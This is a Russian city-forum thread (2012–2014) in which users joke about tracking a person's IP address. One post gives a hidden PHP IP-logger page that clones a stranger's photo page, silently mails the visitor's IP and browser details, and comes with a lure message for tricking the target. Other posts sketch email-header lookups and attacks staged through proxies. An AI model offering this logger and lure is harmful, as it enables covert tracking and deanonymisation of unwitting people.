В Портал Валуйки! Форум города Валуйки
Информационно-развлекательный портал города Валуйки
 
 FAQFAQ   ПоискПоиск   ПользователиПользователи   ГруппыГруппы   РегистрацияРегистрация 
 ПрофильПрофиль   Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 

Как вычислить ip?

Начать новую тему Ответить на тему Список форумов Форум города Валуйки -> The Sysadminsday
Предыдущая тема :: Следующая тема
Автор Сообщение
valer00n
Пропавший Без Вести


Зарегистрирован: 01.01.1970
Сообщения: 363

СообщениеДобавлено: Пт Янв 20, 2012 10:24 am Заголовок сообщения: Как вычислить ip? Ответить с цитатой


_________________
ККИ Uniqum

"...не ослабло кунфу шаманов, не стали менее звонки их бубны, не отказали им в своей благосклонности духи Верхнего мира и сам Аман Саган Нойон."
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
bazilio28
Гуляючий сам по себе


Зарегистрирован: 16.04.2009
Сообщения: 4814

СообщениеДобавлено: Пт Янв 20, 2012 11:54 pm Заголовок сообщения: Ответить с цитатой

Мне тоже ужасно стыдно за этих дятлов, как и охреневшему Мухтару.
шзсщташп -- теперь буду знать козырную команду)),как по бумажному письму вычислять ай пи . Чудны дела твои , Господи!

_________________
"> /dev/null 2>&1"
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
bazilio28
Гуляючий сам по себе


Зарегистрирован: 16.04.2009
Сообщения: 4814

СообщениеДобавлено: Сб Янв 21, 2012 4:35 am Заголовок сообщения: Ответить с цитатой

obk писал(а):
не думал,что это большой секрет...

Laughing Laughing Секрет секрет ищо какой. Нужно Гламурному по сикрету сказануть. А если ишшо и слэш добавить с букавками или all. Ваще хакерцство ,будить сильная. Кабы ишшо како-та тилнет знать с камандами. Или Нмап или Гидру с Купрой шо будииить)))) Воот бы наааам с Гламурненьким эфто усё знааать. Эххх! темнота мы неумытая так и умрём неучами(((.
obk
Это ж прикол))) Мой кот больше знает, чем эти два *удака из сериала.

_________________
"> /dev/null 2>&1"
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
[G]ламурный падонак!
Падонаг форума


Зарегистрирован: 25.01.2008
Сообщения: 1729
Откуда: voronezh

СообщениеДобавлено: Сб Янв 21, 2012 11:04 am Заголовок сообщения: Ответить с цитатой

bazilio28 писал(а):
Чудны дела твои , Господи!


пути господни неисповидимы...)))

bazilio28 писал(а):
тилнет


шо це таке? да нахрен мне все это есть же win word!!!

_________________
У тебя есть борода? Я скажу тебе ДА!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
bazilio28
Гуляючий сам по себе


Зарегистрирован: 16.04.2009
Сообщения: 4814

СообщениеДобавлено: Сб Янв 21, 2012 11:20 am Заголовок сообщения: Ответить с цитатой

[G]ламурный падонак! писал(а):
мне все это есть же win word

Я тока Икселем магу,а вордом не магу(.

_________________
"> /dev/null 2>&1"
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Yuri11076
Почотнай фотокор!


Зарегистрирован: 02.12.2008
Сообщения: 550
Откуда: Валуйки

СообщениеДобавлено: Сб Янв 21, 2012 4:09 pm Заголовок сообщения: Ответить с цитатой

Мдя, круто у нас полиционеры работают )))
_________________
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
[G]ламурный падонак!
Падонаг форума


Зарегистрирован: 25.01.2008
Сообщения: 1729
Откуда: voronezh

СообщениеДобавлено: Пн Янв 23, 2012 11:40 pm Заголовок сообщения: Ответить с цитатой

1. Общаться с ним по аське. Многие icq-клиенты, такие как Miranda IM, SIM и т.п., показывают ip в информации о пользователе. Если не хотите качать продвинутые клиенты, можно воспользоваться специальными программами типа uin2ip, или патчами для стандартных версий ICQ.

Кроме того, на сайте www.leader.ru есть UIN Locator. Вводишь UIN получаешь IP, главное чтобы чел был не в оффлайне.

2. Добиться того, чтобы пользователь прислал тебе письмо. Вне зависимости от того, пользуется ли он веб-интерфейсом, или же почтовиком вроде TheBat!, в заголовках сообщения будет указан его ip. В TheBat! Заголовки можно прочитать, нажав правую кнопку и выбрать в контекстном меню «показывать заголовки RFC-822». Ищи текст «Received: from», который находится ближе всего к телу письма – сразу за этими словами будет ip-адрес отправителя.

3. Узнать на каких irc-каналах сидит юзер и посмотреть там.

4. Если ничего не помогает, но очень хочется, не отчаивайся.

Если у тебя есть хостинг, на котором можно исполнять perl/php (если нет, можно бесплатно зарегистрировать, например, на h15.ru), то вот еще один способ – выбираешь страничку, на которой есть фотография какого-нибудь случайного человека (допустим, http://masters.donntu.edu.ua/2001/ggeo/pavelchak/), полностью копируешь HTML-код в новый файл, например, info.html и сохраняешь его на своем сайте. Рядом создаешь еще один файл index.php, следующего содержания:

Код:
<?
  $message = "Date: " .
  date("d.m.Y H:i:s") .
  "\nIP: " . $REMOTE_ADDR .
  "\nServer: " .
  gethostbyaddr($REMOTE_ADDR) .
  "\nHTTP_X_FORWARDED_FOR: " .
  $HTTP_X_FORWARDED_FOR .
  "\nPage: " .
  $SERVER_NAME .
  $REQUEST_URI .
  "\nQuery: " .
  $QUERY_STRING .
  "\nComing from: " .
  $HTTP_REFERER .
  "\nBrowser: " .
  $HTTP_USER_AGENT .
  "\nFilename: " .
  $SCRIPT_FILENAME;
  mail("admin@mail.ru",
  "Requested ip", $message,
  "From: admin@mail.ru\nContent-Type: text/plain; charset=windows-1251",
  "-fadmin@mail.ru");
  $ = fopen("log.txt", "a");
  fwrite($fp, str_replace("\n", "\t", $message) . "\n");
  fclose($fp);
  include("fil.html");
?>


Само собой, мыло admin@mail.ru необходимо заменить на твой почтовый ящик. Эта страничка (index.php) визуально не будет отличаться от оригинала, но логи с ip и параметрами системы юзера отошлются тебе на почту и продублируются в лог-файл (проверь, что у этого файла есть права на запись, например 666, или 777). Кроме того, если человек находится в локальной сети, ты получишь еще и его локальный ip, а если ходит через прокси, то поимеешь ip как прокси, так и его собственный.

Теперь твоя задача – заманить юзера на эту страничку. Само собой, не стоит просто присылать ее по аське. Мой любимый способ такой: «Привет [тут имя того, чей ip хочешь узнать], ты помнишь Таню ([а вот тут как раз линк на твою страничку с фоткой])? Она сказала, ты можешь помочь мне с дизайном (взломом, разведением кактусов и т.п).

Действует 100% :)

_________________
У тебя есть борода? Я скажу тебе ДА!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
bazilio28
Гуляючий сам по себе


Зарегистрирован: 16.04.2009
Сообщения: 4814

СообщениеДобавлено: Вт Ноя 26, 2013 10:24 pm Заголовок сообщения: Ответить с цитатой

Хостинги и дедики... слишком много заморочек. Есть более простые вещи, которые не особо афишируются. Помимо этого есть программы для пентестинга. Для тех кто прошёл обучение этот вопрос совершенно не актуален. Ну узнал ай пи дальше что? Дальше нужны знания для утилизации его. А сейчас уже это мало кому интересно. Кто будет заморачиваться с малознакомыми командами метасплойта или эрмитажа? Опять же нужно найти сайт, грохнуть его, установить там свой прокси и тогда уже с чужого компьютера пытаться закинуть тот же эксплойт, предварительно купив его баксов этак за 1000, откомпилировать(это значит знать С++), исправить ошибки и продолжать реализовывать свои замыслы.
_________________
"> /dev/null 2>&1"
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
NoBody
Агент 008


Зарегистрирован: 10.06.2004
Сообщения: 2666
Откуда: городок

СообщениеДобавлено: Чт Ноя 28, 2013 12:37 pm Заголовок сообщения: Ответить с цитатой

И такое кругом и рядом.

В аське:

- Привет!
- привет.
- Тебя как зовут?
- не скажу!
- хм... ivanova.nastya-1999@mail.ru
...

- Слышь Настя! Я кажется был знаком с твоей мамой! Какая у неё была девичья фамилия?
- Костенко
- хм... у тебя 5-ть непрочитанных писем.

_________________
Волхов
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
Univer
Обитатель форума


Зарегистрирован: 31.05.2006
Сообщения: 140
Откуда: Валуйки

СообщениеДобавлено: Ср Июн 18, 2014 4:23 pm Заголовок сообщения: Ответить с цитатой

Да не хрена вы не поняли!!! Это разоблачение века!

Письмо это бумажное как раз было отправлено из Интернет Кафе "Золотая Нить", и именно с этого компа, за которым сидит чудохакер (об этом напрямую указывает результат команды ipconfig) - значит эта комора и есть Кафе "Золотая Нить"!!!

Преступники можно сказать внутри коллектива!!!!!!

И дальше: если они точно узнали где стоит этот комп с ip, а он стоит перед ихними умными мордами - значит они точно знают его почтовый адрес!!! эврика!

Ну с юридическим адресом придётся повозиться, возможно таки да придётся использовать ipconfig /all........

зы Валерон уморил...

_________________
"Критики - это обычно те люди, которые были бы поэтами, историками, биографами, если бы могли, но испробовав свои таланты в этих или иных областях и потерпев неудачу, решили заняться критикой" Чехов А. П.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
bazilio28
Гуляючий сам по себе


Зарегистрирован: 16.04.2009
Сообщения: 4814

СообщениеДобавлено: Ср Июн 18, 2014 4:38 pm Заголовок сообщения: Ответить с цитатой

А по сути тут всё верно, но режиссёр ступил. У следователя ведь есть электронное письмо. А в теле каждого такого письма присутствует IP )) То есть жмём -"посмотреть св-ва письма"
Получим приблизительно следующее:
Received: from mxback40.mail.yandex.net ([127.0.0.1])
by mxback40.mail.yandex.net with LMTP id oPhWAJOK
for <vlabreg@yandex.ru>; Fri, 9 Nov 2012 00:50:25 +0400
Received: from web7g.yandex.ru (web7g.yandex.ru [95.108.252.107])
by mxback40.mail.yandex.net (nwsmtp/Yandex) with ESMTP id oPgmERDR-oPgWFFJH;
Fri, 9 Nov 2012 00:50:25 +0400
X-Yandex-Front: mxback40.mail.yandex.net
X-Yandex-TimeMark: 1352407825
Authentication-Results: mxback40.mail.yandex.net; dkim=pass header.i=@yandex.ru
Received: from 127.0.0.1 (localhost.localdomain [127.0.0.1])
by web7g.yandex.ru (Yandex) with ESMTP id 295704250029;
Fri, 9 Nov 2012 00:50:25 +0400 (MSK)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yandex.ru; s=mail;
t=1352407825; bh=yOwMhfpJQBPap5kQo9eBzo0ge2tZqYVKFTHv4vYu/zg=;
h=From:To:In-Reply-To:References:Subject:Date;
b=A3DgDlwUu0+2zkWVPAgb8ofHKxKOlP1aUhtvONHxC8XN4HVGtn5FPzm7xSi3fN+fr
nE1QY61evYOEATHA0PU8virFPgH08htLOCRJaR2Mdy1hJWWqOOfmdP860fIIS+FYUn
THdahiXL69QuFhjaTrO7ozQdVJP1gOS+5OeRXNok=
X-Yandex-Spam: 1
X-Yandex-Front: web7g.yandex.ru
X-Yandex-TimeMark: 1352407825
Received: from [217.118.95.67] ([217.118.95.67]) by web7g.yandex.ru with HTTP;

_________________
"> /dev/null 2>&1"
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
DED
Старейшина Племени


Зарегистрирован: 19.05.2004
Сообщения: 348

СообщениеДобавлено: Ср Июл 02, 2014 2:33 am Заголовок сообщения: Ответить с цитатой

А смысл IP если динамический то получишь провайдера а дальше что? прокуратура и какой клиент был под этим IP?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
bazilio28
Гуляючий сам по себе


Зарегистрирован: 16.04.2009
Сообщения: 4814

СообщениеДобавлено: Ср Июл 02, 2014 3:04 am Заголовок сообщения: Ответить с цитатой

DED писал(а):
а дальше что?

А дальше это смотря какую цель преследовать)). Если на точка com, то даже из под винды можно снять много информации. А если точка ru, то посложнее. 99% дают для снятия информации социальные сети. То есть снятия информации с места работы пользователя. Другими словами получить полный root. Из под никсов можно вообще чудеса творить . Встроенные утилиты позволяют по IP узнать Ось, открытые порты (ssh, почта,80 порт) это самое безобидное. Только знаний нужно достаточно для безопасности. А именно: Получить доступ полный к сайту с малограмотным админом (благо сейчас таких пруд пруди) с него нужно пошаманить с проксями платными и уже оттуда только и с компьютера не домашнего запускать НМАП, Эрмитаж, Метасплойт (никсовские!). Обучение по их пользованию тоже нужно пройти основательно. Это один из способов.

_________________
"> /dev/null 2>&1"
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
DED
Старейшина Племени


Зарегистрирован: 19.05.2004
Сообщения: 348

СообщениеДобавлено: Чт Июл 03, 2014 12:20 am Заголовок сообщения: Ответить с цитатой

Ну да сталкивался я тут в валуйках с одной конторой которая не могла понять откуда у них такие счета за инет. Чуть ли за работниками не следили был белый IP и оплата по трафику). Оказалось все прозаичнее их сервак стал просто анонимной проксей через которую прогоняли кучу трафика)
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
bazilio28
Гуляючий сам по себе


Зарегистрирован: 16.04.2009
Сообщения: 4814

СообщениеДобавлено: Чт Июл 03, 2014 1:27 am Заголовок сообщения: Ответить с цитатой

DED
А я как приехал столкнулся с более простым решением местных умельцев.
В одной из фирм приходящие ремонтники просто открыли доступ к папкам. Причём почти ко всем. Ну на ХР это когда папка лежит на ладошке. Фирма денежная. я стал говорить о доступе.7 лет назад меня не поняли, но разрешили исправить если уж я такой вумный.

_________________
"> /dev/null 2>&1"
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Показать сообщения:
Начать новую тему Ответить на тему Список форумов Форум города Валуйки -> The Sysadminsday Часовой пояс: GMT + 3
Страница 1 из 1


Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы можете вкладывать файлы
Вы можете скачивать файлы


Город Алексеевка   Объявления Алексеевки


Powered by phpBB © 2001, 2005 phpBB Group

File Attachment © by Meik Sievertsen